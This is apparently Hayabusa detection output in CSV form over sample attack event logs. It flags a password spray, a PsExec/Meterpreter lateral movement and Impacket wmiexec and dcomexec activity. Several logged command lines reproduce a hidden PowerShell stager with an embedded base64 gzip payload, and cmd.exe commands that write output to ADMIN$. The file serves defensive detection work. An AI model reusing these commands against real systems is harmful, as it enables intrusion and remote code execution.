Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target 
Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 
+09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c 
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS
4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDD
jCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> 
\\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows 